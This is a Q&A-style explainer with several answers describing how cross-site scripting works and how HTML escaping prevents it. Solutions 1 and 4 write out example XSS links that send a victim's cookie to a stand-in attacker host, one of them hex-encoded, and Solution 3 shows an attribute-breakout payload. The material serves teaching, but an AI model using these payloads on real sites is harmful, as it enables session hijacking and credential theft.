How does XSS work?

Solution 1:

Cross-Site Scripting is basically a security vulnerability of dynamic web pages where an attacker can create a malicious link to inject unwanted executable JavaScript into a Web site. The most usual case of these vulnerabilities occurs when GET variables are printed or echoed without filtering or checking their content.

When a victim clicks the link, the malicious code can then send the victim’s cookie away to another server, or it can modify the affected site, injecting forms, to steal usernames and passwords, and other phishing techniques.

Example of malicious link:

http://VulnerableHost/a.php?variable=<script>document.location='http://AttackersHost/cgi-bin/cookie.cgi%3Fdata='+document.cookie</script>

It's also common to encode the malicious code, for example in hex:

http://VulnerableHost/a.php?variable=%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%41%74%74%61%63%6B%65%72%73%48%6F%73%74%2F%63%67%69%2D%62%69%6E%2F%63%6F%6F%6B%69%65%2E%63%67%69%3F%20%27%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73%63%72%69%70%74%3E

Solution 2:

An XSS vulnerability exists whenever a string from outside your application can be interpreted as code.

For example, if you're generating HTML by doing this:

<BODY>
  <?= $myQueryParameter ?>
</BODY>

then if the $myQueryParameter variable contains a <SCRIPT> tag, it will end up executing code.

To prevent an input from being executed as code, you need to escape content properly.

The above problem can be solved by realizing that the $myQueryParameter variable contains plain text, but you can't just go and put plain text into HTML and expect it to work.

So you need to convert plain text to HTML so you can put it into your HTML page. That process of converting a string in one language to another so that it can be embedded is escaping.

You can escape plain text to HTML with a function like:

function escapePlainTextToHTML(plainText) {
  return plainText.replace(/\0/g, '')
      .replace(/&/g, '&amp;')
      .replace(/</g, '&lt;')
      .replace(/>/g, '&gt;')
      .replace(/"/g, '&#34;')
      .replace(/'/g, '&#39;');
}

Solution 3:

In Simple English

XSS is when you insert scripts (meaning JavaScript code) into webpages, so that the browser executes the code. This is malicious, because it can be used to steal cookies, and any other data on the page. For example:

The HTML of a search box: <input value="*search value here*">

Now if you insert " onmouseover="alert(1), the final HTML would be <input value="" onmouseover="alert(1)">. When the mouse is passed over the search box, the "alert" will be executed.

In "WikiText"

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.

Solution 4:

In simple English, XSS is a security vulnerability in which an attacker can frame a malicious script to compromise the website. Now, how does it work?

As we know, XSS needs an input field, or we can say the GET variable, through which the input is echoed back to the user without filtration (and sometimes with filtration). After the request, it is accepted ("source code") by the browser as a response to show the contents to the user. Remember, whatever you had written in the input field will be in the source code response. So you should check it, because sometimes the web developer makes restrictions on the alert box.

If you are an attacker, first you need to know the XSS vulnerability by using the script tag.

For example:- alert("test")

Here alert() is used to make the popup box with the OK button, and whatever you have written in the brackets will pop up on the screen. And script tags are invisible.

Now attacker can make a malicious script to steal the cookie, steal the credentials etc.

For example:- hxxp://www.VulnerableSite.com/index.php?search=location.href = ‘http://www.Yoursite.com/Stealer.php?cookie=’+document.cookie;

Here your site is the attacker's site, to which the attacker can redirect the victim's cookie with the help of document.cookie.

That's it.

Here the script tag is invisible.

Solution 5:

I've written up an article on what XSS is and how to address it somewhat as a PHP developer. There are also examples of what both types of XSS attacks look like (persistent vs. non-persistent).

There are two types of XSS attacks:

  1. Non-persistent: This would be a specially crafted URL that embeds a script as one of the parameters to the target page. The nasty URL can be sent out in an email with the intent of tricking the recipient into clicking it. The target page mishandles the parameter and unintentionally sends code to the client's machine that was passed in originally through the URL string.
  2. Persistent: This attack uses a page on a site that saves form data to the database without handling the input data properly. A malicious user can embed a nasty script as part of a typical data field (like Last Name) that is run on the client's web browser unknowingly. Normally the nasty script would be stored to the database and re-run on every client's visit to the infected page.

See more here: http://www.thedablog.com/what-is-xss/